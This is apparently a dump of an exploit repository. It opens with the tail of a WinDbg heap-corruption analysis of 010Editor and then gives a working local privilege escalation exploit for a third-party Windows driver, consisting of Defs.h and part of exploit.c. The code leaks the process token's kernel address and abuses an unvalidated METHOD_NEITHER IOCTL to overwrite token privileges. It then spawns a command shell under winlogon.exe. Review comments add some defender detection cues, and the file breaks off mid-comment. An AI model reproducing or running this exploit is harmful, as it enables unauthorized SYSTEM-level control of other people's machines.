159 | 0000007a`cdf6bd80 00007ffc`d8febf35 Qt5Widgets+0x0
160 | 0000007a`cdf6be00 00007ffc`d8febd5c Qt5Widgets+0x0
161 | 0000007a`cdf6be30 00007ffc`d901a2f4 Qt5Widgets+0x0
162 | 0000007a`cdf6bf10 00007ffc`d90212b5 Qt5Widgets+0x0
163 | 0000007a`cdf6bf90 00007ffc`d8f09b3d Qt5Widgets+0x0
164 | 0000007a`cdf6bff0 00007ffc`d8f08b60 Qt5Widgets+0x0
165 | 0000007a`cdf6c070 00007ffc`d8f0b276 Qt5Widgets+0x0
166 | 0000007a`cdf6c0a0 00007ffc`d8ef5820 Qt5Widgets+0x0
167 | 0000007a`cdf6c0d0 00007ffc`d8ef48b8 Qt5Widgets+0x0
168 | 0000007a`cdf6c600 00007ffc`d2986f3a Qt5Core+0x0
169 | 0000007a`cdf6c670 00007ffc`d2988ce5 Qt5Core+0x0
170 | 0000007a`cdf6c730 00007ffc`f390dd5f qwindows+0x0
171 | 0000007a`cdf6c760 00007ffc`d29d1587 Qt5Core+0x0
172 | 0000007a`cdf6f8a0 00007ffc`f390dd39 qwindows+0x0
173 | 0000007a`cdf6f8d0 00007ffc`d298307c Qt5Core+0x0
174 | 0000007a`cdf6f930 00007ffc`d2985f04 Qt5Core+0x0
175 | 0000007a`cdf6f990 00007ff7`e3c109c4 010Editor+0x0
176 | 0000007a`cdf6fb00 00007ff7`e3d47967 010Editor+0x0
177 | 0000007a`cdf6fb90 00007ff7`e3d468e6 010Editor+0x0
178 | 0000007a`cdf6fbd0 00007ffd`49067374 KERNEL32!BaseThreadInitThunk+0x0
179 | 0000007a`cdf6fc00 00007ffd`4a2dcc91 ntdll!RtlUserThreadStart+0x0
180 |
181 |
182 | STACK_COMMAND: ** Pseudo Context ** Pseudo ** Value: ffffffff ** ; kb
183 |
184 | SYMBOL_NAME: 010Editor.exe!heap_corruption!010Editor.exe
185 |
186 | MODULE_NAME: 010Editor
187 |
188 | IMAGE_NAME: 010Editor.exe
189 |
190 | FAILURE_BUCKET_ID: HEAP_CORRUPTION_c0000374_010Editor.exe!heap_corruption!010Editor.exe
191 |
192 | OS_VERSION: 10.0.19041.1
193 |
194 | BUILDLAB_STR: vb_release
195 |
196 | OSPLATFORM_TYPE: x64
197 |
198 | OSNAME: Windows 10
199 |
200 | IMAGE_VERSION: 14.0.1.0
201 |
202 | FAILURE_ID_HASH: {1b833736-4abe-e70f-202c-45eeab348924}
203 |
204 | Followup: MachineOwner
205 | ---------
206 |
207 | 0:000> dq 7ffd4a3f97f0
208 | 00007ffd`4a3f97f0 000006d0`00000002 00000000`00000006
209 | 00007ffd`4a3f9800 0000020c`521b0000 0000020c`5d12a3c0
210 | 00007ffd`4a3f9810 00000000`00000000 00000000`00000000
211 | 00007ffd`4a3f9820 00000000`00000000 0000020c`5d119fb0
212 | 00007ffd`4a3f9830 0000020c`5d139fc0 00000000`00000fc0
213 | 00007ffd`4a3f9840 00000000`00001041 00007ffd`4a39e081
214 | 00007ffd`4a3f9850 00007ffd`4a2bd80f 00007ffd`4a2bb44d
215 | 00007ffd`4a3f9860 00007ffd`4a2af44f 00007ffd`4a2b0b31
216 | 0:000> !heap 7ffd4a3f97f0
217 | HEAPEXT: Unable to get address of ntdll!RtlpHeapInvalidBadAddress.
218 | Index Address Name Debugging options enabled
219 | 0:000> !heap
220 | **************************************************************
221 | * *
222 | * HEAP ERROR DETECTED *
223 | * *
224 | **************************************************************
225 |
226 | Details:
227 |
228 | Heap address: 0000020c521b0000
229 | Error address: 0000020c5d12a3c0
230 | Last known valid blocks: before - 0000020c5d119fb0, after - 0000020c5d139fc0
231 | Error type: HEAP_FAILURE_BUFFER_OVERRUN
232 | Details: The heap manager detected an error whose features are
233 | consistent with a buffer overrun.
234 | Follow-up: Enable pageheap.
235 |
236 | Stack trace:
237 | Stack trace at 0x00007ffd4a3f9848
238 | 00007ffd4a39e081: ntdll!RtlpLogHeapFailure+0x45
239 | 00007ffd4a2bd80f: ntdll!RtlpAllocateHeap+0x6af
240 | 00007ffd4a2bb44d: ntdll!RtlpAllocateHeapInternal+0xa2d
241 | 00007ffd4a2af44f: ntdll!RtlpAllocateUserBlockFromHeap+0x63
242 | 00007ffd4a2b0b31: ntdll!RtlpAllocateUserBlock+0x111
243 | 00007ffd4a2bbeda: ntdll!RtlpLowFragHeapAllocFromContext+0x88a
244 | 00007ffd4a2bb3c7: ntdll!RtlpAllocateHeapInternal+0x9a7
245 | 00007ffd47f0fde6: ucrtbase!_malloc_base+0x36
246 | 00007ffcd2a92cc3: Qt5Core!QCoreApplication::translate+0x49a23
247 | 00007ffcd29c1671: Qt5Core!QVariant::QVariant+0x21
248 | 00007ffcd27bdd8e: Qt5Core!QVariantAnimation::qt_static_metacall+0x111e
249 | 00007ffcd27c0109: Qt5Core!QVariantAnimation::interpolated+0x49
250 | 00007ffcd27c14e0: Qt5Core!QVariantAnimation::qt_metacast+0x5b0
251 | 00007ffcd27bb616: Qt5Core!QAbstractAnimation::setCurrentTime+0xd6
252 | 00007ffcd27bbaeb: Qt5Core!QUnifiedTimer::setSlowdownFactor+0x29b
253 | 00007ffcd8fbe31b: Qt5Widgets!QMainWindowLayoutSeparatorHelper::adjustCursor+0x81b
254 |
255 | Heap Address NT/Segment Heap
256 |
257 | 0000020c521b0000 NT Heap
258 | 0000020c52020000 NT Heap
259 | 0000020c52400000 NT Heap
260 | 0000020c53c00000 NT Heap
261 | 0:000> dq 0000020c5d12a3c0
262 | 0000020c`5d12a3c0 01010101`01010101 00010101`01010101
263 | 0000020c`5d12a3d0 0000020c`5d255bc0 0000020c`5d14afb0
264 | 0000020c`5d12a3e0 00000000`00000000 00000000`00000000
265 | 0000020c`5d12a3f0 00000000`00000000 00000000`00000000
266 | 0000020c`5d12a400 00000000`00000000 00000000`00000000
267 | 0000020c`5d12a410 00000000`00000000 00000000`00000000
268 | 0000020c`5d12a420 00000000`00000000 00000000`00000000
269 | 0000020c`5d12a430 00000000`00000000 00000000`00000000
270 |
--------------------------------------------------------------------------------
/Windows/SystemMechanicPro/Defs.h:
--------------------------------------------------------------------------------
#pragma once
// NOTE(review): the header name on the next line was lost in extraction
// (angle-bracket names are stripped). The types used below (DWORD, PVOID,
// NTSTATUS, uint64_t, ...) imply the Windows SDK headers plus <stdint.h>;
// restore the include before building.
#include

// 0x226003 decodes as device type 0x22 (FILE_DEVICE_UNKNOWN), function 0x800,
// FILE_READ_ACCESS, METHOD_NEITHER. With METHOD_NEITHER the I/O manager hands
// the driver the caller's buffer pointers unvalidated: the driver alone is
// responsible for probing them and for never treating a caller-supplied
// address as a write destination — which is exactly what exploit.c relies on.
#define IOCTL_trigger_bug 0x226003 // (UNKNOWN (0x22) | 0x800 | FILE_READ_ACCESS | METHOD_NEITHER)
// Argument block the driver reads through input_buffer.ptr_to_args.
// Field meanings depend on input_buffer.function_index; exploit.c's main()
// passes {1, 10, 3, 4} with function_index 5 — the driver-side semantics of
// these values are not documented anywhere in this repository.
typedef struct _arguments_to_func
{
    uint64_t arg1;
    uint64_t arg2;
    int64_t arg3;
    int64_t arg4;
} arguments_to_func;
13 |
// Request layout handed to the driver as the raw IOCTL input buffer
// (see arbitrary_write() in exploit.c).
typedef struct _input_buffer
{
    DWORD function_index;           // selects the driver-side handler; main() uses 5
    DWORD padding;                  // explicit pad so the pointer below sits at offset 8
    arguments_to_func *ptr_to_args; // user-mode pointer to the argument block
    PVOID ptr2_to_return;           // by its name, where the driver stores a result;
                                    // main() fills it with a kernel token address, so
                                    // an unprobed write through it is the primitive
} input_buffer;
21 |
// NTSTATUS / object-manager constants normally supplied by ntstatus.h and
// winternl.h; redefined here so those headers are not required.
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) // drives the buffer-grow loop in GetTokenAddress()
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)              // NOTE(review): unused — exploit.c compares against 0 / NOERROR instead
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define FILE_OPEN 0x00000001
// NOTE(review): not referenced anywhere in exploit.c; main() hardcodes the
// literals 0x41 / 0x49 / 0x51 instead, so this macro and the code can drift.
#define OFFSET_OF_TOKEN_PRIVILEGES 0x40 // Windows X >= Windows Vista
27 |
// Same shape as the SDK's InitializeObjectAttributes: a bare brace block (not
// do { } while (0)) with unparenthesised n/a/r/s arguments. That is only safe
// when used as a standalone statement with simple arguments, which is how
// main() in exploit.c uses it (the trailing ';' there becomes an empty
// statement). Do not wrap it in an unbraced if/else.
#define InitializeObjectAttributes( p, n, a, r, s ) { \
    (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
    (p)->RootDirectory = r; \
    (p)->Attributes = a; \
    (p)->ObjectName = n; \
    (p)->SecurityDescriptor = s; \
    (p)->SecurityQualityOfService = NULL; \
}
36 |
// Information classes accepted by NtQuerySystemInformation. Values are
// sequential 0..239 with no gaps. Only SystemHandleInformation (16) is used in
// this repository (GetTokenAddress() in exploit.c); the rest are carried along
// so the enum matches the kernel's numbering. Note the preserved upstream
// spelling "SystemPrioritySeperation" (39).
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation = 0,
    SystemProcessorInformation = 1,
    SystemPerformanceInformation = 2,
    SystemTimeOfDayInformation = 3,
    SystemPathInformation = 4,
    SystemProcessInformation = 5,
    SystemCallCountInformation = 6,
    SystemDeviceInformation = 7,
    SystemProcessorPerformanceInformation = 8,
    SystemFlagsInformation = 9,
    SystemCallTimeInformation = 10,
    SystemModuleInformation = 11,
    SystemLocksInformation = 12,
    SystemStackTraceInformation = 13,
    SystemPagedPoolInformation = 14,
    SystemNonPagedPoolInformation = 15,
    SystemHandleInformation = 16,       // legacy handle table; entries are SYSTEM_HANDLE_TABLE_ENTRY_INFO
    SystemObjectInformation = 17,
    SystemPageFileInformation = 18,
    SystemVdmInstemulInformation = 19,
    SystemVdmBopInformation = 20,
    SystemFileCacheInformation = 21,
    SystemPoolTagInformation = 22,
    SystemInterruptInformation = 23,
    SystemDpcBehaviorInformation = 24,
    SystemFullMemoryInformation = 25,
    SystemLoadGdiDriverInformation = 26,
    SystemUnloadGdiDriverInformation = 27,
    SystemTimeAdjustmentInformation = 28,
    SystemSummaryMemoryInformation = 29,
    SystemMirrorMemoryInformation = 30,
    SystemPerformanceTraceInformation = 31,
    SystemObsolete0 = 32,
    SystemExceptionInformation = 33,
    SystemCrashDumpStateInformation = 34,
    SystemKernelDebuggerInformation = 35,
    SystemContextSwitchInformation = 36,
    SystemRegistryQuotaInformation = 37,
    SystemExtendServiceTableInformation = 38,
    SystemPrioritySeperation = 39,
    SystemVerifierAddDriverInformation = 40,
    SystemVerifierRemoveDriverInformation = 41,
    SystemProcessorIdleInformation = 42,
    SystemLegacyDriverInformation = 43,
    SystemCurrentTimeZoneInformation = 44,
    SystemLookasideInformation = 45,
    SystemTimeSlipNotification = 46,
    SystemSessionCreate = 47,
    SystemSessionDetach = 48,
    SystemSessionInformation = 49,
    SystemRangeStartInformation = 50,
    SystemVerifierInformation = 51,
    SystemVerifierThunkExtend = 52,
    SystemSessionProcessInformation = 53,
    SystemLoadGdiDriverInSystemSpace = 54,
    SystemNumaProcessorMap = 55,
    SystemPrefetcherInformation = 56,
    SystemExtendedProcessInformation = 57,
    SystemRecommendedSharedDataAlignment = 58,
    SystemComPlusPackage = 59,
    SystemNumaAvailableMemory = 60,
    SystemProcessorPowerInformation = 61,
    SystemEmulationBasicInformation = 62,
    SystemEmulationProcessorInformation = 63,
    SystemExtendedHandleInformation = 64,
    SystemLostDelayedWriteInformation = 65,
    SystemBigPoolInformation = 66,
    SystemSessionPoolTagInformation = 67,
    SystemSessionMappedViewInformation = 68,
    SystemHotpatchInformation = 69,
    SystemObjectSecurityMode = 70,
    SystemWatchdogTimerHandler = 71,
    SystemWatchdogTimerInformation = 72,
    SystemLogicalProcessorInformation = 73,
    SystemWow64SharedInformationObsolete = 74,
    SystemRegisterFirmwareTableInformationHandler = 75,
    SystemFirmwareTableInformation = 76,
    SystemModuleInformationEx = 77,
    SystemVerifierTriageInformation = 78,
    SystemSuperfetchInformation = 79,
    SystemMemoryListInformation = 80,
    SystemFileCacheInformationEx = 81,
    SystemThreadPriorityClientIdInformation = 82,
    SystemProcessorIdleCycleTimeInformation = 83,
    SystemVerifierCancellationInformation = 84,
    SystemProcessorPowerInformationEx = 85,
    SystemRefTraceInformation = 86,
    SystemSpecialPoolInformation = 87,
    SystemProcessIdInformation = 88,
    SystemErrorPortInformation = 89,
    SystemBootEnvironmentInformation = 90,
    SystemHypervisorInformation = 91,
    SystemVerifierInformationEx = 92,
    SystemTimeZoneInformation = 93,
    SystemImageFileExecutionOptionsInformation = 94,
    SystemCoverageInformation = 95,
    SystemPrefetchPatchInformation = 96,
    SystemVerifierFaultsInformation = 97,
    SystemSystemPartitionInformation = 98,
    SystemSystemDiskInformation = 99,
    SystemProcessorPerformanceDistribution = 100,
    SystemNumaProximityNodeInformation = 101,
    SystemDynamicTimeZoneInformation = 102,
    SystemCodeIntegrityInformation = 103,
    SystemProcessorMicrocodeUpdateInformation = 104,
    SystemProcessorBrandString = 105,
    SystemVirtualAddressInformation = 106,
    SystemLogicalProcessorAndGroupInformation = 107,
    SystemProcessorCycleTimeInformation = 108,
    SystemStoreInformation = 109,
    SystemRegistryAppendString = 110,
    SystemAitSamplingValue = 111,
    SystemVhdBootInformation = 112,
    SystemCpuQuotaInformation = 113,
    SystemNativeBasicInformation = 114,
    SystemErrorPortTimeouts = 115,
    SystemLowPriorityIoInformation = 116,
    SystemBootEntropyInformation = 117,
    SystemVerifierCountersInformation = 118,
    SystemPagedPoolInformationEx = 119,
    SystemSystemPtesInformationEx = 120,
    SystemNodeDistanceInformation = 121,
    SystemAcpiAuditInformation = 122,
    SystemBasicPerformanceInformation = 123,
    SystemQueryPerformanceCounterInformation = 124,
    SystemSessionBigPoolInformation = 125,
    SystemBootGraphicsInformation = 126,
    SystemScrubPhysicalMemoryInformation = 127,
    SystemBadPageInformation = 128,
    SystemProcessorProfileControlArea = 129,
    SystemCombinePhysicalMemoryInformation = 130,
    SystemEntropyInterruptTimingInformation = 131,
    SystemConsoleInformation = 132,
    SystemPlatformBinaryInformation = 133,
    SystemPolicyInformation = 134,
    SystemHypervisorProcessorCountInformation = 135,
    SystemDeviceDataInformation = 136,
    SystemDeviceDataEnumerationInformation = 137,
    SystemMemoryTopologyInformation = 138,
    SystemMemoryChannelInformation = 139,
    SystemBootLogoInformation = 140,
    SystemProcessorPerformanceInformationEx = 141,
    SystemCriticalProcessErrorLogInformation = 142,
    SystemSecureBootPolicyInformation = 143,
    SystemPageFileInformationEx = 144,
    SystemSecureBootInformation = 145,
    SystemEntropyInterruptTimingRawInformation = 146,
    SystemPortableWorkspaceEfiLauncherInformation = 147,
    SystemFullProcessInformation = 148,
    SystemKernelDebuggerInformationEx = 149,
    SystemBootMetadataInformation = 150,
    SystemSoftRebootInformation = 151,
    SystemElamCertificateInformation = 152,
    SystemOfflineDumpConfigInformation = 153,
    SystemProcessorFeaturesInformation = 154,
    SystemRegistryReconciliationInformation = 155,
    SystemEdidInformation = 156,
    SystemManufacturingInformation = 157,
    SystemEnergyEstimationConfigInformation = 158,
    SystemHypervisorDetailInformation = 159,
    SystemProcessorCycleStatsInformation = 160,
    SystemVmGenerationCountInformation = 161,
    SystemTrustedPlatformModuleInformation = 162,
    SystemKernelDebuggerFlags = 163,
    SystemCodeIntegrityPolicyInformation = 164,
    SystemIsolatedUserModeInformation = 165,
    SystemHardwareSecurityTestInterfaceResultsInformation = 166,
    SystemSingleModuleInformation = 167,
    SystemAllowedCpuSetsInformation = 168,
    SystemVsmProtectionInformation = 169,
    SystemInterruptCpuSetsInformation = 170,
    SystemSecureBootPolicyFullInformation = 171,
    SystemCodeIntegrityPolicyFullInformation = 172,
    SystemAffinitizedInterruptProcessorInformation = 173,
    SystemRootSiloInformation = 174,
    SystemCpuSetInformation = 175,
    SystemCpuSetTagInformation = 176,
    SystemWin32WerStartCallout = 177,
    SystemSecureKernelProfileInformation = 178,
    SystemCodeIntegrityPlatformManifestInformation = 179,
    SystemInterruptSteeringInformation = 180,
    SystemSupportedProcessorArchitectures = 181,
    SystemMemoryUsageInformation = 182,
    SystemCodeIntegrityCertificateInformation = 183,
    SystemPhysicalMemoryInformation = 184,
    SystemControlFlowTransition = 185,
    SystemKernelDebuggingAllowed = 186,
    SystemActivityModerationExeState = 187,
    SystemActivityModerationUserSettings = 188,
    SystemCodeIntegrityPoliciesFullInformation = 189,
    SystemCodeIntegrityUnlockInformation = 190,
    SystemIntegrityQuotaInformation = 191,
    SystemFlushInformation = 192,
    SystemProcessorIdleMaskInformation = 193,
    SystemSecureDumpEncryptionInformation = 194,
    SystemWriteConstraintInformation = 195,
    SystemKernelVaShadowInformation = 196,
    SystemHypervisorSharedPageInformation = 197,
    SystemFirmwareBootPerformanceInformation = 198,
    SystemCodeIntegrityVerificationInformation = 199,
    SystemFirmwarePartitionInformation = 200,
    SystemSpeculationControlInformation = 201,
    SystemDmaGuardPolicyInformation = 202,
    SystemEnclaveLaunchControlInformation = 203,
    SystemWorkloadAllowedCpuSetsInformation = 204,
    SystemCodeIntegrityUnlockModeInformation = 205,
    SystemLeapSecondInformation = 206,
    SystemFlags2Information = 207,
    SystemSecurityModelInformation = 208,
    SystemCodeIntegritySyntheticCacheInformation = 209,
    SystemFeatureConfigurationInformation = 210,
    SystemFeatureConfigurationSectionInformation = 211,
    SystemFeatureUsageSubscriptionInformation = 212,
    SystemSecureSpeculationControlInformation = 213,
    SystemSpacesBootInformation = 214,
    SystemFwRamdiskInformation = 215,
    SystemWheaIpmiHardwareInformation = 216,
    SystemDifSetRuleClassInformation = 217,
    SystemDifClearRuleClassInformation = 218,
    SystemDifApplyPluginVerificationOnDriver = 219,
    SystemDifRemovePluginVerificationOnDriver = 220,
    SystemShadowStackInformation = 221,
    SystemBuildVersionInformation = 222,
    SystemPoolLimitInformation = 223,
    SystemCodeIntegrityAddDynamicStore = 224,
    SystemCodeIntegrityClearDynamicStores = 225,
    SystemDifPoolTrackingInformation = 226,
    SystemPoolZeroingInformation = 227,
    SystemDpcWatchdogInformation = 228,
    SystemDpcWatchdogInformation2 = 229,
    SystemSupportedProcessorArchitectures2 = 230,
    SystemSingleProcessorRelationshipInformation = 231,
    SystemXfgCheckFailureInformation = 232,
    SystemIommuStateInformation = 233,
    SystemHypervisorMinrootInformation = 234,
    SystemHypervisorBootPagesInformation = 235,
    SystemPointerAuthInformation = 236,
    SystemSecureKernelDebuggerInformation = 237,
    SystemOriginalImageFeatureInformation = 238,
    MaxSystemInfoClass = 239
} SYSTEM_INFORMATION_CLASS;
279 |
// One entry of the legacy SystemHandleInformation table.
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    unsigned short UniqueProcessId;        // owning PID; only 16 bits are available here
    unsigned short CreatorBackTraceIndex;
    unsigned char ObjectTypeIndex;
    unsigned char HandleAttributes;
    unsigned short HandleValue;            // low 16 bits of the handle; GetTokenAddress() matches (USHORT)token against it
    void* Object;                          // kernel address of the object — the value GetTokenAddress() returns
    unsigned long GrantedAccess;
    long __PADDING__[1];                   // NOTE(review): double-underscore identifiers are reserved for the implementation
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
291 |
// Variable-length buffer returned for SystemHandleInformation. Handles[1] is
// the pre-C99 trailing-array idiom: GetTokenAddress() indexes it up to
// NumberOfHandles inside a buffer sized by the kernel's ReturnLength.
typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
297 |
// Local redeclaration of the ntdll UNICODE_STRING (Length/MaximumLength in
// bytes, not characters). NOTE(review): this will collide with <winternl.h>
// if that header is among the stripped includes — confirm.
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
303 |
// Local redeclaration of the ntdll OBJECT_ATTRIBUTES consumed by NtCreateFile;
// filled by the InitializeObjectAttributes macro above. Same <winternl.h>
// collision caveat as UNICODE_STRING.
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
313 |
// Local redeclaration of the ntdll IO_STATUS_BLOCK. The anonymous union is a
// C11 feature (also an MSVC extension in older modes). exploit.c passes
// instances as out-parameters only and never reads them back.
typedef struct _IO_STATUS_BLOCK
{
    union
    {
        NTSTATUS Status;
        PVOID Pointer;
    };
    ULONG_PTR Information;
} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;
323 |
// Pointer type for ntdll!NtQuerySystemInformation, resolved at runtime by
// init_ntdll() in exploit.c. Uses the older __in/__inout SAL spellings while
// the typedefs below use _In_/_Out_ — both need sal.h via the Windows headers.
typedef NTSTATUS(NTAPI* pNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );
330 |
// Pointer type for ntdll!RtlInitUnicodeString (resolved by init_ntdll()).
// It only points DestinationString->Buffer at SourceString; the caller keeps
// the wide string alive for as long as the UNICODE_STRING is used.
typedef VOID(NTAPI* pRtlInitUnicodeString)(
    _Out_ PUNICODE_STRING DestinationString,
    _In_opt_z_ PCWSTR SourceString
    );
335 |
// Pointer type for ntdll!NtCreateFile (resolved by init_ntdll()). main() uses
// it to open the driver's device object by NT path rather than CreateFileW.
typedef NTSTATUS(NTAPI* pNtCreateFile)(
    _Out_ PHANDLE FileHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _Out_ PIO_STATUS_BLOCK IoStatusBlock,
    _In_opt_ PLARGE_INTEGER AllocationSize,
    _In_ ULONG FileAttributes,
    _In_ ULONG ShareAccess,
    _In_ ULONG CreateDisposition,
    _In_ ULONG CreateOptions,
    _In_reads_bytes_opt_(EaLength) PVOID EaBuffer,
    _In_ ULONG EaLength
    );
349 |
// APC completion callback type required by the NtDeviceIoControlFile
// prototype below; exploit.c always passes NULL for it. Uses the old IN
// annotation macros from the Windows headers.
typedef
VOID
(NTAPI* PIO_APC_ROUTINE) (
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
    );
357 |
// Pointer type for ntdll!NtDeviceIoControlFile (resolved by init_ntdll()).
// arbitrary_write() calls it synchronously (no event, no APC) with an input
// buffer only; OutputBuffer is NULL and OutputBufferLength is 0.
typedef NTSTATUS(NTAPI* pNtDeviceIoControlFile)(
    _In_ HANDLE FileHandle,
    _In_opt_ HANDLE Event,
    _In_opt_ PIO_APC_ROUTINE ApcRoutine,
    _In_opt_ PVOID ApcContext,
    _Out_ PIO_STATUS_BLOCK IoStatusBlock,
    _In_ ULONG IoControlCode,
    _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
    _In_ ULONG InputBufferLength,
    _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
    _In_ ULONG OutputBufferLength
    );
370 |
--------------------------------------------------------------------------------
/Windows/SystemMechanicPro/exploit.c:
--------------------------------------------------------------------------------
// NOTE(review): the five system header names below were lost in extraction
// (angle-bracket names are stripped). The APIs used in this file —
// CreateToolhelp32Snapshot/PROCESSENTRY32, wprintf/printf, _wcsicmp,
// HeapAlloc, CreateProcessW — imply at least the Windows SDK, TlHelp32 and
// the C stdio/string headers; restore them before building.
#include
#include
#include
#include
#include
#include "Defs.h"

// NOTE(review): linking ntdll.lib statically looks redundant — every ntdll
// export this file uses is resolved at runtime through GetProcAddress in
// init_ntdll(). Harmless, but it can be dropped unless another TU needs it.
#pragma comment(lib, "ntdll.lib")
9 |
// Runtime-resolved ntdll entry points. All four stay NULL until init_ntdll()
// fills them; main() calls init_ntdll() first and aborts if it reports
// failure, but see the NOTE on init_ntdll() — a partially failed resolution
// is not caught, so callers would dereference a NULL pointer here.
pNtQuerySystemInformation NtQuerySystemInformation = NULL;
pRtlInitUnicodeString RtlInitUnicodeString = NULL;
pNtCreateFile NtCreateFile = NULL;
pNtDeviceIoControlFile NtDeviceIoControlFile = NULL;
14 |
// Resolve the kernel address of this process's primary token object.
//
// Opens a TOKEN_QUERY handle to the current process token, then walks the
// system-wide handle table (NtQuerySystemInformation / SystemHandleInformation)
// for the entry whose UniqueProcessId is this process and whose 16-bit
// HandleValue equals the token handle; that entry's Object field is returned.
// main() uses the result as the base of its write targets.
//
// Returns: the token's kernel address, or 0 on any failure or if no matching
// entry exists.
//
// Defender notes: the only right needed is TOKEN_QUERY on the caller's own
// token, so this kernel-pointer disclosure is reachable from a medium
// integrity process. A SystemHandleInformation query followed immediately by
// IOCTLs to a third-party driver is the sequence worth alerting on.
//
// NOTE(review): resource and error handling gaps (left as-is here):
//   - currentToken is never closed on the success path, nor on the path where
//     status != 0 and handleTableInfo is still NULL (which also prints nothing).
//   - the HeapReAlloc result overwrites handleTableInfo directly; if it fails
//     the old block leaks and the loop re-queries with a NULL buffer.
//   - neither HeapAlloc nor HeapReAlloc results are checked.
//   - if status == 0 while handleTableInfo is NULL, NumberOfHandles is read
//     through a NULL pointer.
//   - status is compared with literal 0 although Defs.h defines STATUS_SUCCESS.
UINT_PTR GetTokenAddress()
{
    NTSTATUS status;
    HANDLE currentProcess = GetCurrentProcess();   // pseudo-handle, needs no CloseHandle
    HANDLE currentToken = NULL;
    UINT_PTR tokenAddress = 0;
    ULONG ulBytes = 0;
    PSYSTEM_HANDLE_INFORMATION handleTableInfo = NULL;

    // NOTE(review): "¤tToken" is the HTML entity &curren; having eaten the
    // start of "&currentToken" — an extraction artifact, restore before building.
    BOOL success = OpenProcessToken(currentProcess, TOKEN_QUERY, ¤tToken);
    if (!success)
    {
        wprintf(L"[!] Couldn't open a handle to the current process token. (Error code: %d)\n", GetLastError());
        return 0;
    }
    // Allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API
    // First pass: NULL buffer / 0 length makes the kernel report the needed
    // size in ulBytes; each retry doubles that (the table can grow between calls).
    while ((status = NtQuerySystemInformation(SystemHandleInformation, handleTableInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH)
    {
        if (handleTableInfo != NULL)
        {
            handleTableInfo = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, handleTableInfo, 2 * ulBytes);
        }

        else
        {
            handleTableInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * ulBytes);
        }
    }

    if (status == 0)
    {
        // iterate over the system's handle table and look for the handles beloging to our process
        // (GetCurrentProcessId() is loop-invariant and could be hoisted.)
        for (ULONG i = 0; i < handleTableInfo->NumberOfHandles; i++)
        {
            // if it finds our process and the handle matches the current token handle we already opened, print it
            // HandleValue is only 16 bits wide, hence the (USHORT) truncation of the handle.
            if (handleTableInfo->Handles[i].UniqueProcessId == GetCurrentProcessId() && handleTableInfo->Handles[i].HandleValue == (USHORT)currentToken)
            {
                tokenAddress = (UINT_PTR)handleTableInfo->Handles[i].Object;
                break;
            }
        }
    }
    else
    {
        if (handleTableInfo != NULL)
        {
            wprintf(L"[!] NtQuerySystemInformation failed. (NTSTATUS code: 0x%X)\n", status);
            HeapFree(GetProcessHeap(), 0, handleTableInfo);
            CloseHandle(currentToken);
            return 0;
        }
    }

    // HeapFree(NULL) is tolerated, so the NULL-buffer failure path also lands here.
    HeapFree(GetProcessHeap(), 0, handleTableInfo);

    return tokenAddress;
}
72 |
// Look up the PID of the first process whose image name matches `process`
// (case-insensitive, via a Toolhelp32 process snapshot).
//
// Returns: the PID on a match; 0 if nothing matched; (DWORD)-1 (0xFFFFFFFF)
// if the snapshot or Process32First failed. spawnShell() does not distinguish
// these three outcomes.
//
// NOTE(review): hSnapShot leaks on the Process32First failure path and on the
// match path — only the not-found path reaches CloseHandle. Using _wcsicmp on
// pe32.szExeFile implies UNICODE is defined so PROCESSENTRY32 is the W
// variant; confirm in the project settings (include names were lost in
// extraction).
DWORD getProcessId(const wchar_t* process)
{
    HANDLE hSnapShot;
    PROCESSENTRY32 pe32;
    DWORD pid;


    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (hSnapShot == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Failed to create handle CreateToolhelp32Snapshot()\n\n");
        return -1;
    }

    // dwSize must be set before Process32First or the call fails.
    pe32.dwSize = sizeof(PROCESSENTRY32);

    if (Process32First(hSnapShot, &pe32) == FALSE)
    {
        printf("\n[-] Failed to call Process32First()\n\n");
        return -1;
    }

    do
    {
        if (_wcsicmp(pe32.szExeFile, process) == 0)
        {
            pid = pe32.th32ProcessID;
            return pid;   // NOTE(review): returns without closing hSnapShot
        }
    } while (Process32Next(hSnapShot, &pe32));

    CloseHandle(hSnapShot);
    return 0;
}
108 |
// Launch cmd.exe with winlogon.exe declared as its parent via
// PROC_THREAD_ATTRIBUTE_PARENT_PROCESS. main() calls this after the token
// overwrite; presumably opening winlogon.exe with PROCESS_ALL_ACCESS only
// succeeds once the caller's privileges have been raised — not verified here.
//
// Returns: 0 on success; -1 if winlogon.exe could not be opened; FALSE (also
